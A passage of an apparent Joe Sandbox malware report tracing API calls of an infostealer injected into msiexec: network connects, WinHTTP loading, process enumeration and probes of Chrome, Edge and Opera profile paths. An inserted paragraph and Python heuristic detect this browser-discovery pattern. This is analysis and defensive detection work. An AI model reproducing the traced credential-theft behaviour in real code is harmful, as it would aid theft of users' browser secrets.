                                                                                                                                                                                                          • getaddrinfo.WS2_32(?,00000010,?,?), ref: 214D85F0
                                                                                                                                                                                                          • FormatMessageA.KERNEL32(000012FF,00000000,00000000,00000400,214FC4F0,00000400,00000000,?,00000010,?,?), ref: 214D8613
                                                                                                                                                                                                          • socket.WS2_32(?,?,?), ref: 214D8659
                                                                                                                                                                                                          • connect.WS2_32(00000000,?,?), ref: 214D866D
                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 214D8679
                                                                                                                                                                                                          • FreeAddrInfoW.WS2_32(?), ref: 214D8689
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddrFormatFreeInfoMessageclosesocketconnectgetaddrinfosocket
                                                                                                                                                                                                          • String ID: getaddrinfo: %s
                                                                                                                                                                                                          • API String ID: 1733616599-4118680637
                                                                                                                                                                                                          • Opcode ID: 96966bbb9f4fd2d0a098b9bb0d1e5808fc7f597d2034337b133cb5fe35094464
                                                                                                                                                                                                          • Instruction ID: 8509d85270973a8de6a6eb0b523b5cc98d37b9fc2bdbc80af7bda7b9025d4557
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96966bbb9f4fd2d0a098b9bb0d1e5808fc7f597d2034337b133cb5fe35094464
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF110233A40215ABEB218EA09C40FAA7379AB45B30F100628FB2DA33C0DB31A9118795

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                                          control_flow_graph 1042 214d2b20-214d2b73 call 214eff70 call 214d7310 1047 214d2b75-214d2b91 call 214d3dc0 1042->1047 1048 214d2b96-214d2be7 1042->1048 1052 214d2d87-214d2da1 call 214d36c0 1047->1052 1057 214d2bee-214d2bf0 1048->1057 1058 214d2c08-214d2c13 1057->1058 1059 214d2bf2-214d2c03 GetLastError call 214d37e0 1057->1059 1058->1059 1063 214d2c15-214d2c40 1058->1063 1059->1052 1065 214d2d5b-214d2d82 call 214d37e0 call 214d36c0 1063->1065 1066 214d2c46-214d2c51 1063->1066 1065->1052 1066->1065 1069 214d2c57-214d2c72 1066->1069 1073 214d2c74-214d2c79 1069->1073 1074 214d2cd2-214d2ce8 call 214d2db0 1069->1074 1077 214d2c80-214d2c85 1073->1077 1082 214d2d4f-214d2d56 call 214d36c0 1074->1082 1083 214d2cea-214d2cf0 1074->1083 1077->1074 1080 214d2c87-214d2ca4 1077->1080 1091 214d2ca6-214d2cc1 call 214d3570 1080->1091 1092 214d2cc3-214d2cd0 1080->1092 1082->1065 1084 214d2d34-214d2d4a call 214d40f0 1083->1084 1085 214d2cf2-214d2cfb 1083->1085 1084->1082 1088 214d2cfd-214d2d00 1085->1088 1089 214d2d2b-214d2d31 call 214da956 1085->1089 1094 214d2d07-214d2d0c 1088->1094 1095 214d2d02 call 214ddaab 1088->1095 1089->1084 1091->1080 1091->1092 1092->1074 1092->1077 1100 214d2d0e call 214ddaab 1094->1100 1101 214d2d13-214d2d18 1094->1101 1095->1094 1100->1101 1104 214d2d1f-214d2d22 1101->1104 1105 214d2d1a call 214ddaab 1101->1105 1106 214d2d29 1104->1106 1107 214d2d24 call 214ddaab 1104->1107 1105->1104 1106->1089 1107->1106
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 214D7310: LoadLibraryW.KERNEL32(winhttp.dll,?,214D2B6F), ref: 214D7316
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 214D7333
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 214D7340
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 214D734D
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 214D735A
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 214D7367
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 214D7374
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 214D7381
                                                                                                                                                                                                            • Part of subcall function 214D7310: GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 214D738E
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 214D2BF2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$ErrorLastLibraryLoad
                                                                                                                                                                                                          • String ID: /json$GET$WebClient/1.0$localhost
                                                                                                                                                                                                          • API String ID: 856020675-4094957224
                                                                                                                                                                                                          • Opcode ID: 40afa7a1d7fb0a9e337590c4f55c3cfae0086d2bcfa0e983d992658930d913ee
                                                                                                                                                                                                          • Instruction ID: 3188f2da11ab2ceae01ac7949c571875a18076157726c0bcd1e5d5479354b640
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40afa7a1d7fb0a9e337590c4f55c3cfae0086d2bcfa0e983d992658930d913ee
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6616471A4024A9FEF10DFA4CC58FEEBBB8AF15704F104129E909A73C1DB799605CB61
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 214D7722
                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 214D7744
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 214D774F
                                                                                                                                                                                                          • Process32NextW.KERNEL32(?,0000022C), ref: 214D784F
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 214D7861
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1789362936-0
                                                                                                                                                                                                          • Opcode ID: a02de44b51dd78cbdd512fc88d4527bee455bc4de4658358871a0d3e6da87331
                                                                                                                                                                                                          • Instruction ID: caad754cb531c1d3d98140a73a67fa0ad94acc3400c3712a30732b63bcd2ddc2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a02de44b51dd78cbdd512fc88d4527bee455bc4de4658358871a0d3e6da87331
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3518D72D00219DFCB21CF98C894BAEBBB5FB49715F118659E918A7380D735AA05CBA0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,?,?,214D1539,?,00000000,000000FF,?), ref: 214D7A5B
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,214D1539,?,00000000,000000FF,?,00000000,000000FF,?,00000000), ref: 214D7A6C
                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,214D1539,?,00000000,000000FF), ref: 214D7AB8
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,214D1539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 214D7AC4
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,214D1539,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF), ref: 214D7AD2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseHandle$CreateReadSize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664964396-0
                                                                                                                                                                                                          • Opcode ID: 08fb0cd4c53db40bd8e81095239df178772891d3a4315fbf09a8d27551e2bf93
                                                                                                                                                                                                          • Instruction ID: 4385c8eac7c3f293fa68b61c8dd51119e2136bc0069cfae0ec26bf0d924a19aa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08fb0cd4c53db40bd8e81095239df178772891d3a4315fbf09a8d27551e2bf93
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A11C472240310BFE7304EA89C45F677BACEB46B65F10055DFA09973C1DBB45A01C7A2
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?,\Google\Chrome\Application\Chrome.exe,00000025), ref: 214D634E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                                          • String ID: (x86)$ProgramFiles$\Google\Chrome\Application\Chrome.exe
                                                                                                                                                                                                          • API String ID: 1174141254-1866107781
                                                                                                                                                                                                          • Opcode ID: a6576951c32ca03e7cf9a4477fdde4c2745c17fbca7cd1e68fb98b0b1ef06c89
                                                                                                                                                                                                          • Instruction ID: 75f804b1dfe095596a92f6cb2e602960a5d9a7028d990f805eac2c03082339b5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6576951c32ca03e7cf9a4477fdde4c2745c17fbca7cd1e68fb98b0b1ef06c89
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64418072A10205AFDF04DFA8DC64FAEBBB9FF51704F54051DE409A7390DB3899068B91
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(-00000002,\Opera Software\Opera Stable,?,00000000,-00000002,00000000), ref: 214D61BB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                                          • String ID: AppData$\Opera Software\Opera Stable$|}O!
                                                                                                                                                                                                          • API String ID: 1174141254-3331217881
                                                                                                                                                                                                          • Opcode ID: d50cdc36108fdea53509ddd9dd2dbc9f70b3ec29383d6b910e1e3866cb0a1e76
                                                                                                                                                                                                          • Instruction ID: 030706f66854355414fd6eebfe62c1ea4e98fab3ec4e6b2346c6a8576f547a98
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d50cdc36108fdea53509ddd9dd2dbc9f70b3ec29383d6b910e1e3866cb0a1e76
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A42181B6D00205EECF14DFB8C865BAEBBB8EF18705F50851DD819A7380DB74A5058BA0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Microsoft\Edge\,0000001E,00000000,-00000002,00000000), ref: 214D60BB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                                          • String ID: ,}O!$UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                                                          • API String ID: 1174141254-892775517
                                                                                                                                                                                                          • Opcode ID: fba937cc3bce98ea4879423b5b10393baa41881bf6f332ac220aaddb5bdb5c1c
                                                                                                                                                                                                          • Instruction ID: a81aecf1c4348fdf226b73aa4d3496c14c132026357d785dd79e3bdce3fd1ae3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fba937cc3bce98ea4879423b5b10393baa41881bf6f332ac220aaddb5bdb5c1c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 932192B6D00205DBCF15DFA8C865BAEB7F8EF18705F10851DD91AA3780DB74A5058BA1
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(-00000002,\Microsoft\Edge\Application\msedge.exe,00000026,00000000,-00000002), ref: 214D644B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • \Microsoft\Edge\Application\msedge.exe, xrefs: 214D642B
                                                                                                                                                                                                          • ProgramFiles, xrefs: 214D63D6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                                          • String ID: ProgramFiles$\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                          • API String ID: 1174141254-1265440269
                                                                                                                                                                                                          • Opcode ID: 795b700ca97ca2dcb1aef8d5b91e926f8a2e5575e2815bcff132e5a4ebf464dc
                                                                                                                                                                                                          • Instruction ID: 17558e9a1a03b8c54c14e786a34d61cf896b4a15c7e8a4bd4df111bf06bed421
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 795b700ca97ca2dcb1aef8d5b91e926f8a2e5575e2815bcff132e5a4ebf464dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F21B572D00205DBCF14DFA8C855BAFB7F9EF14704F10852ED819A3780D774A9058BA4
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Google\Chrome\,0000001D,00000000,-00000002), ref: 214D5FBB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                                                          • API String ID: 1174141254-4188645398
                                                                                                                                                                                                          • Opcode ID: ec68b575bf2b49eed1073bf2df05666660a14af6be8448f1f04535301a95194a
                                                                                                                                                                                                          • Instruction ID: edfedafaf49b6f1dd4839c4df52e2410cfe807a84f951d227dc56328189b51e9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec68b575bf2b49eed1073bf2df05666660a14af6be8448f1f04535301a95194a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F221C7B2D00205DFCF14DFA8C865BAEBBF8EF18705F50855DD419A7380DB7495058B90
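The five PathFileExistsW calls above are the browser-discovery step of the stealer: each function expands an environment variable (ProgramFiles, ProgramFiles(x86), UserProfile, AppData) and tests one Chrome, Edge or Opera install or profile path. One way to turn that pattern into a triage check over a Joe Sandbox disassembly listing is shown below. This is an added example, not code from the report or from Joe Sandbox; the sample lines are the API bullets copied from this listing, the mapping from path fragment to browser name and the set of path-probing APIs are this example's own assumptions, and the "two or more browsers" threshold is a heuristic chosen here, not a published rule.

```python
import re
from collections import defaultdict

# One API bullet of a Joe Sandbox disassembly listing looks like:
#   • PathFileExistsW.SHLWAPI(?,\Google\Chrome\Application\Chrome.exe,00000025), ref: 214D634E
API_LINE = re.compile(
    r"(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Path fragments that identify a browser install or profile directory. Every fragment
# appears verbatim in the PathFileExistsW calls of this listing; the browser labels are
# this example's own mapping (an assumption, not report data).
BROWSER_PATH_MARKERS = {
    "\\Google\\Chrome\\Application\\Chrome.exe": "Chrome",
    "\\AppData\\Local\\Google\\Chrome\\": "Chrome",
    "\\Microsoft\\Edge\\Application\\msedge.exe": "Edge",
    "\\AppData\\Local\\Microsoft\\Edge\\": "Edge",
    "\\Opera Software\\Opera Stable": "Opera",
}

# APIs whose arguments are filesystem paths worth inspecting (assumed set).
PATH_PROBE_APIS = {"PathFileExistsW", "PathFileExistsA", "GetFileAttributesW", "CreateFileW"}

# Constructed input: the seven API bullets copied from the listing above.
SAMPLE_LINES = [
    r"• PathFileExistsW.SHLWAPI(?,\Google\Chrome\Application\Chrome.exe,00000025), ref: 214D634E",
    r"• PathFileExistsW.SHLWAPI(-00000002,\Opera Software\Opera Stable,?,00000000,-00000002,00000000), ref: 214D61BB",
    r"• PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Microsoft\Edge\,0000001E,00000000,-00000002,00000000), ref: 214D60BB",
    r"• PathFileExistsW.SHLWAPI(-00000002,\Microsoft\Edge\Application\msedge.exe,00000026,00000000,-00000002), ref: 214D644B",
    r"• PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Google\Chrome\,0000001D,00000000,-00000002), ref: 214D5FBB",
    r"• RtlFreeHeap.NTDLL(00000000,00000000,?,214ECD2C,?,00000000,?,00000000,?,214ECD53,?,00000007,?,?,214EA21D,?), ref: 214E5A7B",
    r"• GetLastError.KERNEL32(?,?,214ECD2C,?,00000000,?,00000000,?,214ECD53,?,00000007,?,?,214EA21D,?,?), ref: 214E5A8D",
]


def parse_api_calls(lines):
    """Parse API bullets into dicts with api, module, ref and a list of argument strings."""
    calls = []
    for line in lines:
        m = API_LINE.search(line)
        if m:
            calls.append({
                "api": m.group("api"),
                "module": m.group("module"),
                "ref": m.group("ref"),
                "args": [a.strip() for a in m.group("args").split(",")],
            })
    return calls


def browser_probes(calls):
    """Group path-probing calls by the browser whose install/profile path they test.

    Returns {browser: sorted list of (ref, path_argument)}.
    """
    hits = defaultdict(list)
    for call in calls:
        if call["api"] not in PATH_PROBE_APIS:
            continue
        for arg in call["args"]:
            for marker, browser in BROWSER_PATH_MARKERS.items():
                if marker.lower() in arg.lower():
                    hits[browser].append((call["ref"], arg))
    return {browser: sorted(probes) for browser, probes in hits.items()}


def looks_like_browser_stealer(calls, min_browsers=2):
    """Heuristic verdict: code that probes the install or profile paths of several
    browsers in a row is the discovery step of a credential stealer, not ordinary
    application behaviour. Threshold is an assumption of this example."""
    return len(browser_probes(calls)) >= min_browsers


if __name__ == "__main__":
    parsed = parse_api_calls(SAMPLE_LINES)
    for browser, probes in sorted(browser_probes(parsed).items()):
        for ref, path in probes:
            print(f"{browser:<7} {ref}  {path}")
    print("browser stealer heuristic:", looks_like_browser_stealer(parsed))
```

The check keys on the argument strings rather than on the API name alone, because PathFileExistsW by itself is ubiquitous; what distinguishes this code is that one dump region probes Chrome, Edge and Opera locations back to back, which is why the verdict counts distinct browsers rather than calls.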
APIs
• RtlFreeHeap.NTDLL(00000000,00000000,?,214ECD2C,?,00000000,?,00000000,?,214ECD53,?,00000007,?,?,214EA21D,?), ref: 214E5A7B
• GetLastError.KERNEL32(?,?,214ECD2C,?,00000000,?,00000000,?,214ECD53,?,00000007,?,?,214EA21D,?,?), ref: 214E5A8D
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: ErrorFreeHeapLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                          • Opcode ID: 9f5377b7e3093debef2563db09d5357d59ed5ae5e5c3698cea8675fd2472e90a
                                                                                                                                                                                                          • Instruction ID: b6c60fe7b63cdbb9e2484a08962184d321428f081a48291381bc53041de4acc5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f5377b7e3093debef2563db09d5357d59ed5ae5e5c3698cea8675fd2472e90a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86E0E676140325AFDB115FA4980CF553FA9AB50756F104428FA5C96251DA35D5A0C7C8
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 214D7E20: FindFirstFileW.KERNEL32(?,?,?,00000000,75080F00), ref: 214D7ED1
                                                                                                                                                                                                            • Part of subcall function 214D7E20: FindNextFileW.KERNELBASE(00000000,?,?,00000000,75080F00), ref: 214D7F0A
                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 214D7E03
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFind$FirstNextSleep
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2635277345-0
                                                                                                                                                                                                          • Opcode ID: 77c59290013282274d48a479d379334728ff2681192f01dea8213d2348cb284e
                                                                                                                                                                                                          • Instruction ID: 073c46d3b577e218a2e17f997cd13a9909c2ea95f5d38e876a246dea5fb0c316
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77c59290013282274d48a479d379334728ff2681192f01dea8213d2348cb284e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21E086337002146B9A01D6AEDC91D5AF7EEDB95675B51007EEE0CD3300E871DD0182E1
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 214D744D
                                                                                                                                                                                                          • CreateFileW.KERNEL32(000000FF,80000000,?,00000000,00000003,00000080,00000000), ref: 214D75C9
